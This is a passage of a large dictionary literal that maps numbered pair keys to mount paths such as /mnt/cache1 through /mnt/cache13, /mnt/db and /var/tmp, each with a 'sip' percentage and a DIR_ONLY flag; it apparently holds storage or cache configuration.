'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'0-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'9-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'4-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'7-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'7-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'7-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'7-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'10-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'10-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'10-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'10-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'10-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'10-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'10-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'10-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'10-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-6': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'5-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-7': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'5-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-0': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'0-1': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'6-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'6-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'0-2': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'0-3': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'9-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
